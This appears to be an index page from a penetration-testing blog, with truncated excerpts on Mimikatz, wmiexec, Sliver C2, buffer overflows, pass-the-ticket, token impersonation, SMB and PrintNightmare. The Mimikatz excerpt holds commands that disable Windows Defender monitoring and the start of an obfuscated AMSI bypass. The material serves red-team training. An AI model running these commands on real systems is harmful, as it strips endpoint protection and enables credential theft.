Mimikatz CheatSheet
Environment preparation. Run as administrator:
Start-Process PowerShell_ISE -Verb RunAs
Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1
If Windows Defender cannot be disabled, use an AMSI bypass:
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`...
Wmiexec
As part of internal penetration testing in Active Directory environments, it is often necessary to execute remote commands on Windows machines. Several tools are available for this purpose, but one of the most widely used is wmiexec. The general principle of wmiexec. wmiexec lets you execute remote commands without copying files or creating services on the target machine. It is based on WMI (Windows Management Instrumentation), a native Windows technology for controlling a local or remote sy...
SLIVER C2
Introducing SLIVER C2. Sliver is an open-source command and control (C2) framework developed by Bishop Fox, which enables Red Teams to simulate realistic attacks. It combines modularity, security and flexibility for modern penetration testing. What is a C2 framework? A C2 framework enables compromised machines to be remotely controlled through implants (or agents). These implants receive instructions from the C2 server, such as executing commands, transferring files or gathering information. The...
LAPS
In most Active Directory infrastructures, each workstation has a local administrator account. This account is often poorly managed, and in some cases its password is identical on all machines. As a result, an attacker who compromises one of the machines can easily pivot across the network. To solve this problem, Microsoft introduced LAPS v1 (Local Administrator Password Solution) in 2015, then released a more comprehensive version in 2023. This article looks at how the two versions work, and the ...
Buffer Overflow with SPIKE
Objective: Exploit a buffer overflow vulnerability in an application by taking control of the EIP register and executing shellcode. 1. Connect to the target and launch vulnserver. RDP connection to the target: rdesktop -u IEUser -p 'Passw0rd!' 172.16.5.120 Launch vulnserver with: vulnserver.exe 9999 Interacting with the server from our machine, we notice that depending on how we type the command and what we send, we get different responses. 2. Fuzzing with SPIKE. Create a trun.spk sc...
Pass The Ticket Attack
This article is a walkthrough of the INE lab on this attack. PowerView. PowerView is a PowerShell tool for reconnaissance in Windows domains. It contains a set of PowerShell commands that replace the classic Windows net * commands. We start the lab by opening a PowerShell prompt and enabling script execution: Next, we can find the domain machines on which the current user is an administrator: You can then launch a PowerShell session on one of these machines: HF...
Discover SPIKE
What is SPIKE? SPIKE is a protocol fuzzer creation kit. It provides an API for creating your own fuzzers for network protocols, using the C++ language. SPIKE provides a series of basic commands for generating fuzzed messages to be sent to a network service. Scripting SPIKE. For TCP-based server applications, we use a .spk script with the generic_send_tcp interpreter (preinstalled on Kali Linux). The basic syntax is: generic_send_tcp <IP> <port> <script.spk> <SKIPVAR> <...
Token Impersonation
A token is a temporary key that lets you access a system or network without having to present credentials every time you access a resource. These tokens contain information such as: the user's identity, the groups to which the user belongs, and the user's privileges. There are two types of token: Delegate: Created when a user logs on to a machine or connects to a machine via RDP, these tokens enable a user to impersonate another user on another machine on the network (e.g. a service accessing files on an...
SMB
Definition. Server Message Block (SMB) is a protocol for sharing files, accessing printers and other resources on a network. It is generally present on ports 445 and 139. It is natively included in Windows. On Linux machines, a Samba server must first be installed, as Linux does not use this protocol by default. SMB enumeration. SMB enumeration aims to discover the shares available on the network, the access permissions on each share, and the users and groups present on the mac...
The PrintNightmare
Definition. PrintNightmare is an attack exploiting a vulnerability in the Windows print spooler that allows an ordinary user to execute remote commands with administrator privileges. The term PrintNightmare actually refers to two vulnerabilities in the print spooler. One allows privilege escalation and the other allows remote code execution. In this article, we’ll focus solely on the latter. On June 7, 2021, Microsoft released its latest security patch for this vulnerability, which allows...